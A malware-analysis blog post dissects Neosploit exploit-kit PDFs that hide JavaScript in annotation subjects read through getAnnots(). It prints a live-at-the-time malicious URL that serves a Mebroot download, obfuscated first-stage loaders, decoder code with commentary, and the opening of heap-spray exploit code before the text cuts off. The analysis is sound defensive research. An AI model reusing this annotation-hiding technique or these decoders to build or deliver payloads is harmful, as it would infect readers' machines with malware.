Blog

PDF Obfuscation using getAnnots()

Since around October 2009, Neosploit¹, a black-market exploit toolkit, has been fabricating PDF files in a slightly new way, but in a way which is difficult for many parsers to analyze for maliciousness. In summary, all of the metadata in a PDF is accessible from the Acrobat Javascript environment. And this metadata is being used for obscuring embedded Javascript code. A PDF parser would need to fill in all the document objects with the correct data, and evaluate the Javascript to find the exploit. (Needless to say, many PDF signature parsers don’t do this.) These malicious PDFs ultimately install Mebroot (aka: Sinowal)².

[And, oh yeah, our product detects this.]

Breaking News

Update: There’s another exploit toolkit doing similar metadata tricks to obscure a CVE-2009-4324 attack. (That’s the most recent 0-day.)




I’m going to use this for most of my examples (warning: live as of this writing):

google.com.analytics.eicyxtaecun.com/nte/AVORP1TREST11.php

The Wepawet Analysis
The Virus Total Analysis on the downloaded EXE (56a6e96863f6dc0c5c5c64fca6bd3c52)


A Brief Word about Neosploit¹

Like some other toolkits, you can only hit the first exploit page once per source IP. It returns a 404 if you try to fetch it again. The Javascript is broken up into multiple chunks, fetched by the first chunk, deobfuscated, reassembled, and executed. The URI is slightly polymorphic. For example, all of these are really the same program on the server:

google.com.analytics.eicyxtaecun.com/nte/AVORP1TREST11.exe
google.com.analytics.eicyxtaecun.com/nte/AVORP1TREST11.php
google.com.analytics.eicyxtaecun.com/nte/AVORP1TREST11.py
google.com.analytics.eicyxtaecun.com/nte/TREST11 .asp
google.com.analytics.eicyxtaecun.com/nte/TREST11.exe
google.com.analytics.eicyxtaecun.com/nte/TREST11.html
google.com.analytics.eicyxtaecun.com/nte/TREST11.php
google.com.analytics.eicyxtaecun.com/nte/TREST11.py

[etc.]

Any file starting with “j” appears to be Javascript, “e” appears to be EXEs, and “o” are the polymorphically generated exploit PDFs. Observe:

eH999a4551V0100f070006R00000000102Td2dcca7d201l0409K91a68948320: PE32 executable for MS Windows (DLL)
jH999a4551V0100f070006R00000000102Td2dcca7b201L656e2d75730000000000K91a68948: ASCII text, with very long lines
oH999a4551V0100f070006R00000000102Td2dcca7d201l0409K91a68948317: PDF document, version 1.3

The filename is composed of several fields of hexadecimal value, with separators which are not in the set [0-9a-f] (case sensitive, “F” is a valid separator). From the above example:

j H999a4551 V0100f070006 R00000000102 Td2dcca7b 2 01 L656e2d75730000000000 K91a68948
e H999a4551 V0100f070006 R00000000102 Td2dcca7d 2 01 l0409 K91a68948320
o H999a4551 V0100f070006 R00000000102 Td2dcca7d 2 01 l0409 K91a68948317

The “2 01″ is the browser version, “L656e2d75730000000000″ means “en-us” I haven’t bothered to figure out the rest yet.

This is the first chunk of Javascript that hits your browser. If you started from, say http://dgvlvhhytlta.com/nte/GNH4.exe it would fetch the next chunk (the variable pums ) from http://dgvlvhhytlta.com/nte/GNH4.exe/jH999a4551V0100f070006&hellip. These stages are not on the Wepawet analysis I mentioned above, so I'm including them here for completeness.

<html>
<head>
<script>

function nerot(o6v28_IX_KM, D5___o){var O_Pp6_l = arguments.callee;O_Pp6_l = O_Pp6_l.toString();var X6q8_bl = 0;var U_a8___ej = "a" + "f";var Ghc62j5r1Wr8P = document.getElementById(U_a8___ej);if (Ghc62j5r1Wr8P) {if (!D5___o) {D5___o = Ghc62j5r1Wr8P.value;}}X6q8_bl++;X6q8_bl++;var firot = new Array();if (o6v28_IX_KM) { firot = o6v28_IX_KM;} else {var tk_048_6R_6CyPe = 0;var ScS1Bncy_d_8 = 0;var G_2__3A_r = 512;var gw55F_B__BBV2 = 49;gw55F_B__BBV2--;while(ScS1Bncy_d_8 < O_Pp6_l.length) {var G_sv_c7x6qjTn = 1;var m8d_GS__whx = O_Pp6_l.charCodeAt(ScS1Bncy_d_8);if (m8d_GS__whx >= gw55F_B__BBV2 && m8d_GS__whx <= (gw55F_B__BBV2 + 9)) {if (tk_048_6R_6CyPe == 4) { tk_048_6R_6CyPe = 0; }if (isNaN(firot[tk_048_6R_6CyPe])) { firot[tk_048_6R_6CyPe] = 0; }firot[tk_048_6R_6CyPe] += m8d_GS__whx;if (firot[tk_048_6R_6CyPe] > G_2__3A_r) {firot[tk_048_6R_6CyPe] -= G_2__3A_r;}tk_048_6R_6CyPe++;}ScS1Bncy_d_8++;}}tk_048_6R_6CyPe = 4;while (tk_048_6R_6CyPe > 0) {if (firot[tk_048_6R_6CyPe - 1] > 256) {firot[tk_048_6R_6CyPe - 1] -= 256;}tk_048_6R_6CyPe--;}var QmyQ7eL0R = 0;var x1Kf_448jleM42 = "";var sp__yv_2g_K04cp = 0;var j_G1g_1 = 0;var T__D6_r = 0;var y_6A__C_u;var pdbpQb = 0;while(j_G1g_1 < D5___o.length) {var T_B203hvS__Wvt = D5___o.substr(j_G1g_1, 1) + "J";var Pbukfx_2f7D__1w = parseInt(T_B203hvS__Wvt, 16);if (T__D6_r) {y_6A__C_u += Pbukfx_2f7D__1w;if (QmyQ7eL0R == 4) {QmyQ7eL0R -= 4;}var iJ_d_Qth = y_6A__C_u;iJ_d_Qth = iJ_d_Qth - (pdbpQb + 2) * firot[QmyQ7eL0R];if (iJ_d_Qth < 0) {var xgY5uT7__QoL = Math.floor(iJ_d_Qth / 256);iJ_d_Qth = iJ_d_Qth - xgY5uT7__QoL * 256;}iJ_d_Qth = String.fromCharCode(iJ_d_Qth);if (X6q8_bl == 1) {x1Kf_448jleM42 += Pbukfx_2f7D__1w;} else if (X6q8_bl == 2) {x1Kf_448jleM42 += iJ_d_Qth;} else {x1Kf_448jleM42 += j_G1g_1;}QmyQ7eL0R++;pdbpQb++;T__D6_r = 0;} else {y_6A__C_u = Pbukfx_2f7D__1w * 16;T__D6_r = 1;}j_G1g_1++;};;eval(x1Kf_448jleM42);return 0;}

</script>
</head>
<body onload="nerot() ;">
<input type="hidden" id="aa" value="1">
<input type="hidden" id="af" value="F2D096B1BB5AA764CBE6B0E3B18 [&hellip] 745A6F">
<input type="hidden" id="ab" value="1">
</body>
</html>

And the second chunk:


var pums = 'C8763EB09A160F5F0AC4C
EB76';

 

Find The Pattern

Here's some names of generated PDFs, I've broken the names up into, what I believe are, separate fields. See if you can find the pattern. None of these is obviously an IP address. (I checked for that.)

AVORP1TREST11.exe/o U2773a43b H918373c0 V03007f35002 R8d56bfa1108 Tdac6495d Q000002fc900801 F0020000a J11000601l0409 Kfa01dcdb317: PDF document, version 1.3
AVORP1TREST11.php/o Hf7b12f26 V0100f060006Rf53e765c102 Tbcf2d195204 l0409 K98c2615b317: PDF document, version 1.3
AVORP1TREST11.py/o H999a4551 V0100f070006R00000000102 Td2dcca7d201 l0409 K91a68948317: PDF document, version 1.3
AVORP1TREST11.py/o H9efd3f2d V03006f35002Rf53e765c102 Td5b83f0c Q000002fa901801 F0020000a J11000601 l0409 K5b7f0e41317: PDF document, version 1.3
TREST11 .asp/o H47834891 V0100f060006 R89a36f9c102 T0cc787be203l0409 K07105315317: PDF document, version 1.3
TREST11 .asp/o H91b0de2f V0100f070006 R8f56bc05102 Tdaf42f62201l0404 K544d4bfe317: PDF document, version 1.3
TREST11 .asp/o Ha98d29bd V0100f060006 R89a36f9c102 Te2cb340e204l0409 K4b290413317: PDF document, version 1.3
TREST11 .asp/o He22f9c5c V03007f35002 R8d56bfa1102 Ta96aa0ae Q000002fc901801 F000c000a J10000601 l0409 Kc5ceb2bf317: PDF document, version 1.3
TREST11 .asp/o Hf7ba1c39 V03005f35002 Rf53e765c102 Tbcff3946 Q000002fd901801 F0020000a J11000601 l0409 K4e3afa12317: PDF document, version 1.3
TREST11.exe/o H30847807 V0100f060006 R89a36f9c102 T7bc0ed53203l0409 K7b4d501b317: PDF document, version 1.3
TREST11.exe/o H3ebec388 V03007f35002 Rf53e765c102 T75fbc09a Q000002fc901801 F002a000a J11000601 l0409 Kaa9ea783317: PDF document, version 1.3
TREST11.exe/o H82fea487 V0100f080006 Rf53e765c102 Tc9bb26de201l0409 Kfee4acbe317: PDF document, version 1.3
TREST11.html/o H8b9e4040 V03007f35002 Rf53e765c102 Tc0db4487 Q000002fd901801 F002a000a J11000601 l0409 K575b6c55317: PDF document, version 1.3
TREST11.html/o H9ee97623 V03006f35002 Rf53e765c108 Td5ad4a05 Q000002fd900801 F0020000a J11000601 l0409 K539b6710317: PDF document, version 1.3
TREST11.html/o Ha98d29bd V0100f060006 Rf53e765c102 Te2cb34e5204 l0409K35e5f3e5317: PDF document, version 1.3
TREST11.html/o Hd6a7ae5c V0100f080006 Rf53e765c102 T9de446b5201 l0409Kab6a7970317: PDF document, version 1.3
TREST11.php/o H47834891 V0100f060006 Rf53e765c102 T0cc6cd94203 l0409K6c8c5ba1317: PDF document, version 1.3
TREST11.php/o Hdfab3f7e V0100f080006 R8d56bfa110a T94ee748e201 l0409K678f4226317: PDF document, version 1.3
TREST11.php/o Hff15790b V03006f35002 Rf53e765c10a Tb4506ce8 Q000002fc901801 F002a000a J00000000 l0409 Kadd89d89317: PDF document, version 1.3
TREST11.py/o H28d77e41 V0100f060006 R7bd67009102 T63951338203 l0409 K3c732e33317: PDF document, version 1.3
TREST11.py/o H9ef9bb5c V03007f35002 Rf53e765c102 Td5bdef71 Q000002fc901801 F0020000a J11000601 l0409 Kd3978d8b317: PDF document, version 1.3
TREST11.py/o Hde8a192b V0100f060006 R8f56bc05102 T95cf8f5f203 l0409 K6f2c23ff317: PDF document, version 1.3
TREST11.py/o He5441011 V0100f070006 R89a36f9c102 Tae012b23201 l0804 Ka373855f317: PDF document, version 1.3
TREST11.py/o Hf9287a3c V03006f35002 Rf53e765c10a Tb26c5103 Q000002fc900801 F0020000a J00000000 l0409 Kf8aab2d0317: PDF document, version 1.3
TREST11.py/o Hfb50394b V03007f35002 Rf53e765c102 Tb0152511 Q00000000901801 F002a000a J11000601 l0409 K77546b04317: PDF document, version 1.3
chrisbecfiis.com/nte/AVORP1TREST1.py/eH999a4551V0100f070006R00000000102Td2b6e14c201l0409K816c9c70320: PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
cjbtiybcpnf.com/nte/trest11.py/eH999a4551V0100f070006R00000000102Td2a93f54201l0409320: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
google.com.analytics.eicyxtaecun.com/nte/AVORP1TREST11.py/eH999a4551V0100f070006R00000000102Td2dcca7d201l0409K91a68948320: PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit

 

I guess that's more than a brief word.

How To Speak PDF

The PDF itself is rather clean and easy to read³, so I'll step you through it here.

First4, Acrobat checks if the first line is %PDF-1.something, and the last line is %%EOF. The second and third lines from the end are the offset (in bytes) to the cross reference table — the list of objects in the file — and the word startxref. Somewhere near all that, is the trailer dictionary, which says there are nine objects in this file.

The Cross Reference table [xref] is consulted, it says there are nine objects in this table, and that…
Object #1 starts at byte offset 17. (0x11)
Object #2 starts at offset 93. (0x5D), etc…

It's possible to have multiple xref tables by design, so that PDF files can be incrementally updated. [The purpose of this is so that a PDF reader can find each object quickly, without needing to scan the entire file first to locate it, and without needing to rewrite the entire file just to edit something.]

 

xref
0 9
This table references objects 0 through 9
0000000000 65535 fA "Free" (Deleted) Object; Generation 65535 means never reuse this number
0000000017 00000 nObject 1 starts at offset 17 bytes
0000000093 00000 nObject 2 starts at offset 93 bytes
0000000134 00000 nObject 3 starts at offset 134 bytes

            Generation number goes up by one for any object number freed and reused.
[etc.]
0000000411 00000 nObject 7 starts at offset 411 bytes
0000000641 00000 nObject 8 (9th counting from 0)
trailer<</Size 9/Root 1 0 R>> ← Nine objects, Object 1 is the top of the document object tree (The /Catalog object).
startxref
9323
← Offset to xref above
%EOF

 

Offset Examples

 

00000000  25 50 44 46 2d 31 2e 33  0d 0a 25 b1 b3 f3 ce 0d  |%PDF-1.3..%.....|
00000010  0a 31 20 30 20 6f 62 6a  3c 3c 2f 54 79 70 65 2f  |.1 0 obj<</Type/|
             Byte 17 (0x11) is a "1"
[…]
00000040  20 52 2f 4f 70 65 6e 41  63 74 69 6f 6e 20 36 20  | R/OpenAction 6 |
00000050  30 20 52 3e 3e 65 6e 64  6f 62 6a 0d 0a 32 20 30  |0 R>>endobj..2 0|
                                                  Byte 93 (0x5D) is a "2"
00000060  20 6f 62 6a 3c 3c 2f 54  79 70 65 2f 4f 75 74 6c  | obj<</Type/Outl|
[…]
00002450  ff 03 a2 65 8b 77 0d 0a  65 6e 64 73 74 72 65 61  |...e.w..endstrea|
00002460  6d 0d 0a 65 6e 64 6f 62  6a 0d 0a 78 72 65 66 0d  |m..endobj..xref.|
                                             Byte 9323. (0x246B) is a "xref"
00002470  0a 30 20 39 0d 0a 30 30  30 30 30 30 30 30 30 30  |.0 9..0000000000|

 

The comment near the beginning of the file, the four bytes with their high bits set, is a way to warn most systems where there is a distinction between 'text' and 'binary' modes for files, that this file is going to be 'binary'.

Brief Syntax Guide

 

  • Anything between % and end-of-line is a comment.
  • Anything between ()'s is a literal string.
  • Anything starting with a / is a Name.
  • Anything inside of []'s is an array.
  • Anything inside of stream endstream is data stream (think of it as a very large string constant or blob).
  • Anything inside of <<>> is a dictionary (name-value pairs, like this:
    <</Type /foo /Thingy 123456>>)
  • Indirect objects are defined like Object_Number Version obj Stuff endobj. For example: 123 45 obj(I'm a literal string)endobj.
  • An indirect can be used — Referenced — from anywhere else that a normal object (string, integer, etc.) would go, by simply writing the object number and version number followed by an R. For example: 123 45 R substitutes for that literal string in the example above.
  • Every useful dictionary object has an entry for what /Type it is. For example, the /Catalog type is used for the document tree root, and /Font is used for font objects.

 

That Neosploit PDF

Object #1 (The Catalog object) says that…
Object #2 is the top of the Outline tree (that side panel in your PDF viewer)…
Object #3 is the top of the Page tree…
And to perform the action in Object #6 when the document is opened.

Object #2 says there really isn't an outline for this document.

Object #3 says there is one page in the tree, which is Object #4 .

Object #6 says to execute the Javascript in Object #7.

Object #4 is the descendant of Object #3. It says the page size is 612x792 points (or 8.5x11 inches), and that it contains an Annotation, with the annotation details in Object #5…
Object #5 says that Object #8 is the Subject of this Annotation (The sekret Javascript exploit code).

These are the good parts:
Object #7 is the Javascript that's executed upon document open. It's a decoder for the Javascript hidden in…
Object #8 The Annotation Subject string, a large blob of encoded Javascript.

In PDF-Speak

 


%PDF-1.3
%
Four bytes between 0x80 and 0xFF

1 0 obj<</Type/Catalog/Outlines 2 0 R/Pages 3 0 R/OpenAction 6 0 R>>endobj
2 0 obj<</Type/Outlines/Count 0>>endobj
3 0 obj<</Type/Pages/Kids[4 0 R]/Count 1>>endobj
4 0 obj<</Type/Page /Annots[ 5 0 R ]/Parent 3 0 R/MediaBox [0 0 612 792]>>endobj
5 0 obj<</Type/Annot /Subtype /Text /Name /Comment/Rect[25 100 60 115] /Subj 8 0 R>>endobj
6 0 obj<</Type/Action/S/JavaScript/JS 7 0 R>>endobj
7 0 obj<</Length 158/Filter/FlateDecode>>
stream

The zlib compressed data goes here
endstream
endobj
8 0 obj<</Length 8609/Filter/FlateDecode>>
stream

The other zlib compressed data goes here
endstream
endobj
xref
0 9
0000000000 65535 f
0000000017 00000 n
0000000093 00000 n
0000000134 00000 n
0000000184 00000 n
0000000266 00000 n
0000000358 00000 n
0000000411 00000 n
0000000641 00000 n
trailer<</Size 9/Root 1 0 R>>
startxref
9323
%EOF

 

Analysis

The /FlateDecode streams are compressed with the deflate algorithm, the exact same one used in PKZip, gzip, and PNG.

If you're trapped on a desert island, with only primitive Unix tools. You can just slap a gzip header onto the beginning of the zlib compressed blob, and use gunzip to decompress it. (Don't forget to add four bytes to the end for the length.)

 

$ echo -ne "\x1f\x8b\x08\x00BLAH" > example.gz
$ cat stream7 >> example.gz
$ echo -ne "\x00\x00\x00\x00" >> example.gz
$ zcat example.gz |less
zcat: example.gz: invalid compressed data--crc error
zcat: example.gz: invalid compressed data--length error

var z; var y; z = y = app.doc;
y = 0; z.syncAnnotScan ( ); y = z;var p = y.getAnnots( { nPage: 0 }) ;var s = p[0].subject; var l = s.replace(/z/g, '%'); s = unescape (l) ;eval(s); s = ''; z = 1;

Hey look! It's Javascript!

 

This trick only works as long as bit 5 of the second byte of the zlib stream is not set. (Which I've not seen in a PDF stream yet.) I'd explain why this works, but this blog post is too long already. Compare RFC1950 Section 2.2 vs. RFC1952 Section 2.3 if you really want to know. You can also decompress the stream with a pencil and paper too if you don't have a computer. It's not that difficult, just remember that the bits in each octet are reversed from how they look in rfc1951 (Why are y'all looking at me like that? I had to fix a corrupt zip file…)

Otherwise use xpdf or Didier Stevens' tool(s) like a normal person.

pdftosrc oH999a4551V0100f070006R00000000102Td2dcca7d201l0409K91a68948317 7
pdftosrc oH999a4551V0100f070006R00000000102Td2dcca7d201l0409K91a68948317 8
python pdf-parser.py -f oH999a4551V0100f070006R00000000102Td2dcca7d201l0409K91a68948317

 

Back to the PDF

This is the uncompressed stream from Object #7
Almost every PDF I've examind so far has this exact same code in Object #7. (There's apparently a newer version of the toolkit which is doing a little bit of obfuscation to this block.)

var z; var y; z = y = app.doc;
y = 0; z.syncAnnotScan ( ); y = z;var p = y.getAnnots( { nPage: 0 }) ;var s = p[0].subject; var l = s.replace(/z/g, '%'); s = unescape (l) ;eval(s); s = ''; z = 1;

[This getAnnots() usage is completely unrelated to CVE-2009-1492]

 

The uncompressed stream from Object #8; The subject of this annotation, and second stage of Javascript, is:
z0dz0az0dz0az09z66z75z6ez63z74z69z […]

The z characters are replaced by %, and then the whole thing unescape()'d. I've seen other variants use y, g, or h, and a little more obfuscation of the code above.

More obfuscation from a different Neosploit toolkit

For Example:


var z; var y; 
 var h = 'edvoazcl'; 
          z = y = app[h.replace(/[aviezjl]/g, '')]; 
         var tmp = 'syncAEEotScan'; y = 0;       z[tmp.replace(/E/g, 'n')](); y = z; var p = y.getAnnots ( {  nPage: 0 }) ;   var s = p[0]; s = s['sub' + 'ject']; var  l =   s.replace(/[zhyg]/g, '%')  ; s =  unescape ( l  ) ;app[h.replace(/[czomdqs]/g, '')]( s);
 s =  ''; z  = 1;

The 'y' characters are replced by '%', and then the whole thing unescaped.


s.replace(/[zhyg]/g, '%')

y0dy0ay0dy0ay09y66y75y6ey63y74y69y6fy6ey20y58y36y5fy5fy34y6by33y56y64y4ay56y62y30y49y64y28y76y5fy5fy4dy61y78y6ay2cy20y70y30y5fy59y32y54y29y7by76y61y72y20y73y5fy5fy5fy51y33y35y68y [...]

 

About syncAnnotScan and getAnnots

 

12.5.6.4         Text Annotations
A text annotation represents a “sticky note” attached to a point in the PDF document. When closed, the annotation shall appear as an icon; when open, it shall display a pop-up window containing the text of the note in a font and size chosen by the conforming reader. Text annotations shall not scale and rotate with the page; they shall behave as if the NoZoom and NoRotate annotation flags (see Table 165) were always set. Table 172 shows the annotation dictionary entries specific to this type of annotation.
— From the PDF 1.7 Reference ISO 32000-1:2008.

 

So let's take a look at that annotation object again:


5 0 obj <<
   /Type/Annot
   /Subtype /Text
← This is a Text Annotation

   /Name /Comment
← Default to a Comment-Style Icon for display

   /Rect[25 100 60 115]
← Location of the annotation on page.

   /Subj 8 0 R
← Subject is that object full of encoded Javascript
>>endobj

/Subj
Text representing a short description of the subject being addressed by the annotation. ISO 32000-1

 

The getAnnots() function returns an array of annotation objects, and accepts an associative array with the following possible labels [ibid.]:

nPage
A 0-based page number. If not set, all pages that match filter.
nSortBy
A sort method applied to the array. (by Page, Author, Moddate, etc.)
bReverse
If true, causes the array to be reverse sorted with respect to nSortBy.
nFilterBy
Gets only annotations satisfying certain criteria. (Printable, viewable, editable, etc.)

Contrast this with getAnnot() which returns a single Annot object by name.

 

Example

 

// From the Acrobat JavaScript Scripting Reference
// All annotations on the first page, in reverse order by author.
var annots = this.getAnnots({
     nPage:0, 
     nSortBy: ANSB_Author, 
     bReverse: true
});

 

Cleaned Up Code With Commentary

 

var z;
var y; 
z = y = app.doc; 
	 y = 0;
 	 z.syncAnnotScan ( );         // Acrobat scans for annotations in the
                                      // document, as a background task. 
                                      // This function blocks until all of the
                                      // annotations in the document have been found.
y = z;
var p = y.getAnnots( {  nPage: 0 }) ; // This is the new technique.
                                      // getAnnots() returns a list of annotation
                                      // objects. (For the first page in this case)
var s = p[0].subject;                 // Get the subject from the first annotation
                                      // object.
var l = s.replace(/z/g, '%');         // The 'z' characters are replaced by '%'
s =  unescape (l) ;                   // and then the whole thing unescape()'d
eval(s);                              // Run the second stage Javascript
s = ''; 
z = 1;

 

The third layer of this Javascript onion will decode the next part
differently, depending on whether or not the app object is defined. (It is defined inside of Acrobat Reader, but not within most any other ECMAScript/Javascript engines.) If your parser doesn't get a "2" out of this:

try {
       if (app) {
          magic_value = 2;
       }
     } catch(e) {
}

Then it's going to eval() gibberish. If decoded correctly it does a heap spray, and exploits Collab.collectEmailInfo() The shellcode does HTTP download and execute from:
http://google.com.analytics.eicyxtaecun.com/nte/AVORP1TREST11.py/eH999a4551V0100f070006R00000000102Td2dcca7d201l0409K91a68948320
… What Virustotal says about it: 56a6e96863f6dc0c5c5c64fca6bd3c52 (It's Mebroot).

 

 

       function X6__4k3VdJVb0Id(v__Maxj, p0_Y2T){var s___Q35hFa = arguments.callee;var a4__LfE__5a6 = 0;var Do_
YD6N_7p40_r = 512;s___Q35hFa = s___Q35hFa.toString();try {if (app) {a4__LfE__5a6 = 3;a4__LfE__5a6--;}} catch(e) 
{ }var M8I2Nb0IWaPT7 = new Array();if (v__Maxj) { M8I2Nb0IWaPT7 = v__Maxj;} else {var s4_AeGcS_Ru807 = 0;var OKD
_8Y_tjg = 0;var a_i_qruF1_u = 49;a_i_qruF1_u--;while(OKD_8Y_tjg < s___Q35hFa.length) {var hYE0g_2_q = 1;var rTb_
w_VCb55 = s___Q35hFa.charCodeAt(OKD_8Y_tjg);if (rTb_w_VCb55 >= a_i_qruF1_u && rTb_w_VCb55 <= (a_i_qruF1_u + 9)) 
{if (s4_AeGcS_Ru807 == 4) { s4_AeGcS_Ru807 = 0; }if (isNaN(M8I2Nb0IWaPT7[s4_AeGcS_Ru807])) { M8I2Nb0IWaPT7[s4_Ae
GcS_Ru807] = 0; }M8I2Nb0IWaPT7[s4_AeGcS_Ru807] += rTb_w_VCb55;if (M8I2Nb0IWaPT7[s4_AeGcS_Ru807] > Do_YD6N_7p40_r
) {M8I2Nb0IWaPT7[s4_AeGcS_Ru807] -= Do_YD6N_7p40_r;}s4_AeGcS_Ru807++;}OKD_8Y_tjg++;}}s4_AeGcS_Ru807 = 4;Do_YD6N_
7p40_r = 256;while (s4_AeGcS_Ru807 > 0) {var OKD_8Y_tjg = s4_AeGcS_Ru807 - 1;if (M8I2Nb0IWaPT7[OKD_8Y_tjg] > Do_
YD6N_7p40_r) {M8I2Nb0IWaPT7[OKD_8Y_tjg] -= Do_YD6N_7p40_r;}s4_AeGcS_Ru807--;}var F_kH_v = 0;var eG76_l = "";var 
JtRA2__j_Ae = 0;var GbFYrkx_PbnQ6f6 = 0;var J8_i60lnd = 0;var ltqGwaY;var I1_EB__2_wf = 0;while(GbFYrkx_PbnQ6f6 
< p0_Y2T.length) {var c_Y4Ti = p0_Y2T.substr(GbFYrkx_PbnQ6f6, 1) + "J";var A_8_QHs1s = parseInt(c_Y4Ti, 16);if (
J8_i60lnd) {ltqGwaY += A_8_QHs1s;if (F_kH_v == 4) {F_kH_v -= 4;}var uYND0Nm = ltqGwaY;uYND0Nm = uYND0Nm - (I1_EB
__2_wf + 2) * M8I2Nb0IWaPT7[F_kH_v];if (uYND0Nm < 0) {var OF0F_A6__nLc = Math.floor(uYND0Nm / 256);uYND0Nm = uYN
D0Nm - OF0F_A6__nLc * 256;}uYND0Nm = String.fromCharCode(uYND0Nm);if (a4__LfE__5a6 == 1) {eG76_l += A_8_QHs1s;} 
else if (a4__LfE__5a6 == 2) {eG76_l += uYND0Nm;} else {eG76_l += GbFYrkx_PbnQ6f6;}F_kH_v++;I1_EB__2_wf++;J8_i60l
nd = 0;} else {ltqGwaY = A_8_QHs1s * 16;J8_i60lnd = 1;}GbFYrkx_PbnQ6f6++;}eval(eG76_l);return 0;}
        X6__4k3VdJVb0Id(0, "10E5E67437933DC36719A1A5A4B40DA4D8A9BBB4DF662A054BCC55EF7CB512E4914F603DD828A821C294
376A3786906F5F3D1C7FB1B98C73DC440954C8F67BAA4FF217C877A39684B01CFBE5C8F36FE309A3E5DD3D532ACC81E69E13B6A05123AA30
741E0DF8121A15D9705C7546E167C3324D8FF4D50A44245B7A9E4533E67484B643C17F54A584CC4320BEECC7C5B852A3F6C5816DA6D2C613
FF28F8BD8E2BE22DCF4A4F26284F81BBAC4CBA451041AAE6864F24E34A4C6885BE54890631A3C1D9A58CAE71C894FD047FA667F3F7D99B7C

[…]B9647DC9");

 

Howto Deobfuscate


Ya'know, if you wanted to…

The obfuscation in this case is just a search and replace with random variable names, so just search and replace them back to something meaningful.

  • Replace ";" with ";\n" and "}\n" to prettyprint.
  • When you see var M8I2Nb0IWaPT7 = new Array(); you can rename M8I2Nb0IWaPT7 to something more meaningful like "array1".
  • When you see eval(eG76_l); you can rename eG76_l to something like evaluated_string.
  • When you see for(var 6R_6CyPe=0;6R_6CyPe<0x_17x5;6R_6CyPe+=2){ you can say, oh hey, 6R_6CyPe is an index, and 0x_17x5 is the loop count
  • charCodeAt(index) returns a byte
  • p0_Y2T.substr and s___Q35hFa.length are strings, so rename apropriately
  • function X6__4k3VdJVb0Id( is a function, so rename apropriately
  • while(OKD_8Y_tjg < s___Q35hFa.length){ OKD_8Y_tjg++; well it's a good guess that OKD_8Y_tjg is a loop index.
  • Use common sense to make the Javascript ledgible to humans. (None of this matters if you're a machine.)

 

The Javascript, gets a copy of itself (the blob of code being eval()'d) using arguments.callee; which is hashes into a four byte key. I just added a…
var callee = unescape('%66%75%6e%63%74%69%6f%6e%20%58%36%5f [...] %6e%20%30%3b%7d');
of the original obfuscated code (just up to the %09 (TAB) character), and repaced arguments.callee.toString() with callee.

 

function decode(arg1, arg2_hex){
//var argarg = arguments.callee;
var argarg = callee;  // that unescape() I mentioned
//var threethings = 0; // Original
var threethings = 2; // Who cares that app is missing?
var fivetwelve = 512;
argarg = argarg.toString();
try {
      if (app) {
         threethings = 3;
         threethings--; // So you mean 2 then
      }
    } catch(e) {
}
var array1 = new Array();
if (arg1) {
   array1 = arg1;
} else {
   var fourthings = 0;
   var index = 0;
   var fourtynine = 49;
   fourtynine--; // ok 48 then (it's for ASCII "0")
   while(index < argarg.length) {
      var hYE0g_2_q = 1; // unused
      var input_byte = argarg.charCodeAt(index);
      // In set of [0-9]
      if (input_byte >= fourtynine && input_byte <= (fourtynine + 9)) {
         if (fourthings == 4) {
            fourthings = 0;
         }
         if (isNaN(array1[fourthings])) {
            array1[fourthings] = 0;
         }
         array1[fourthings] += input_byte;
         // keep total from getting too big
         if (array1[fourthings] > fivetwelve) {
            array1[fourthings] -= fivetwelve;
         }
          fourthings++;
      } // if
      index++;
  } // while
} // if
 print(array1); // 154,315,117,92
   fourthings = 4;
   fivetwelve = 256;
   while (fourthings > 0) {
      var index = fourthings - 1;
      // keep to a byte
      if (array1[index] > fivetwelve) { //256
         array1[index] -= fivetwelve;   //256
      }
      fourthings--;
   } // while
var indexmod4 = 0;
var evaluated = "";
var JtRA2__j_Ae = 0; // unused
var index2 = 0;
var flag = 0;
var accumulator;
var index3 = 0;
while(index2 < arg2_hex.length) {
//   var c_Y4Ti = arg2_hex.substr(index2, 1) + "J";
   var c_Y4Ti = arg2_hex.substr(index2, 1) ;
   var parsedint = parseInt(c_Y4Ti, 16);
   if (flag) {
      accumulator += parsedint;
      if (indexmod4 == 4) {
         indexmod4 -= 4;
      }
      var lotsomath = accumulator;
      lotsomath = lotsomath - (index3 + 2) * array1[indexmod4];
      if (lotsomath < 0) {
         var mod256 = Math.floor(lotsomath / 256);
         lotsomath = lotsomath - mod256 * 256;
      }
      if (threethings == 1) {
         evaluated += parsedint; // This should never run
      } else if (threethings == 2) {
         evaluated += lotsomath; // This is the only line that actually decrypts
      } else {
         evaluated += index2;  // This should never run
      }
      indexmod4++;
      index3++;
      flag = 0;
   } else {
      accumulator = parsedint * 16;
      flag = 1;
   } // while
   index2++;
} // while
eval(evaluated);
return 0;
}

 

The Next Part After That

And finally, we've made it to the crunchy center of this metaphor. This does the heap spray, and exploits Collab.collectEmailInfo(). Nothing really new here.

 


ar I8tR_yfW_B_G_4 = new Array();var co3L10RH0e_sDj = 0;var k_IbUu = "";function w4U_ES(QnE1DcNMb, c_i4I__W){var LHE7_u = c_i4I__W.toString();var b1oTk__25tEY4 = "";for(var S8_T83_ajR = 0; S8_T83_ajR < LHE7_u.length; S8_T83_ajR++) {var ksHn4MF6Hh4cHia = parseInt(LHE7_u.substr(S8_T83_ajR, 1));if (!isNaN(ksHn4MF6Hh4cHia)) {ksHn4MF6Hh4cHia = ksHn4MF6Hh4cHia.toString(16);if (ksHn4MF6Hh4cHia.length == 1) { ksHn4MF6Hh4cHia = "0" + ksHn4MF6Hh4cHia; }else if (ksHn4MF6Hh4cHia.length != 2) { ksHn4MF6Hh4cHia = "00"; }b1oTk__25tEY4 = ksHn4MF6Hh4cHia + b1oTk__25tEY4;}}while(b1oTk__25tEY4.length < 8) { b1oTk__25tEY4 = "0" + b1oTk__25tEY4; }var k__7_H1 = QnE1DcNMb.toString(16);if (k__7_H1.length == 1) { k__7_H1 = "0" + k__7_H1; }else if (k__7_H1.length != 2) { k__7_H1 = "00"; }b1oTk__25tEY4 = "3" + k__7_H1 + "P" + b1oTk__25tEY4;return b1oTk__25tEY4;}function Bsv_7_w_r_Vmg(H_O610_85G, G_Rp3BOccXCA){var A_p_p7p2__u2x = new Array("");var nd__8__O_E6 = H_O610_85G;var O86U_8;if ((O86U_8 = H_O610_85G.lastIndexOf("%u00")) != -1) {if (O86U_8 + 6 == H_O610_85G.length) {A_p_p7p2__u2x[0] = H_O610_85G.substr(O86U_8 + 4, 2);nd__8__O_E6 = H_O610_85G.substring(0, 